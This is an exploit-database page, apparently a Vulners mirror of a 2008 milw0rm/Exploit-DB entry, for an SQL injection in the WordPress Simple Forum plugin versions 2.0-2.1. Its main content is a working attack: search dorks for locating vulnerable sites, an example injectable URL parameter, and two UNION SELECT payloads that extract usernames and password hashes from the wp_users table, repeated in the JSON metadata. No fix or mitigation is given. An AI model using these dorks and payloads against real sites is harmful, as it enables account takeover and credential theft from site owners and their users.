Search...

WordPress Plugin Simple Forum 2.0-2.1 - SQL Injection Vulnerability

2008-02-15T00:00:00

ID EDB-ID:5126
Type exploitdb
Reporter S@BUN
Modified 2008-02-15T00:00:00

Description

Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ###############################################################
#
# Simple Forum Version 2.0-2.1(sf-forum)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################

DORKS 1 :

Simple Forum - Version 2.0 (Build 207)
Simple Forum - SÃ¼rÃ¼m 2.1 (Build 228)
Simple Forum - Version 2.1 (Build 236)

DORK 2 : allinurl: "sf-forum?forum"

################################################################
example :

http://www.xxx.com/sf-forum?forum=[exploit]

EXPLOIT 1 :

-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*

exploit 2 :

-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*

################################################################
# S@BUN               i AM NOT HACKER               S@BUN
################################################################

# milw0rm.com [2008-02-15]

JSON Vulners Source

Initial Source

{"hash": "03d8810dcf4548e45f578e40d6ba73544d82dc5df7ca7debcba7d7d581c53821", "id": "EDB-ID:5126", "lastseen": "2016-01-31T21:38:22", "enchantments": {"vulnersScore": 10.0}, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/5126/", "description": "Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability. Webapps exploit for php platform", "title": "WordPress Plugin Simple Forum 2.0-2.1 - SQL Injection Vulnerability", "sourceData": "###############################################################\n#\n# Simple Forum Version 2.0-2.1(sf-forum)\n#\n###############################################################\n#\n# AUTHOR : S@BUN\n#\n# HOME : http://www.milw0rm.com/author/1334\n#\n# MA\u00c4\u00b0L : hackturkiye.hackturkiye@gmail.com\n#\n################################################################\n\nDORKS 1 :\n\nSimple Forum - Version 2.0 (Build 207)\nSimple Forum - S\u00c3\u00bcr\u00c3\u00bcm 2.1 (Build 228)\nSimple Forum - Version 2.1 (Build 236)\n\nDORK 2 : allinurl: \"sf-forum?forum\"\n\n################################################################\nexample :\n\nhttp://www.xxx.com/sf-forum?forum=[exploit]\n\nEXPLOIT 1 :\n\n-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*\n\nexploit 2 :\n\n-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*\n\n################################################################\n# S@BUN i AM NOT HACKER S@BUN\n################################################################\n\n# milw0rm.com [2008-02-15]\n", "objectVersion": "1.0", "cvelist": [], "published": "2008-02-15T00:00:00", "osvdbidlist": [], "references": [], "reporter": "S@BUN", "modified": "2008-02-15T00:00:00", "href": "https://www.exploit-db.com/exploits/5126/"}